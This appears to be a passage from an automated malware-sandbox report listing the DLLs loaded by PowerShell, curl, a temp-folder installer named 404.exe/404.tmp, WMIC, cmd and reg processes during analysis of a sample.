Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: globinputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
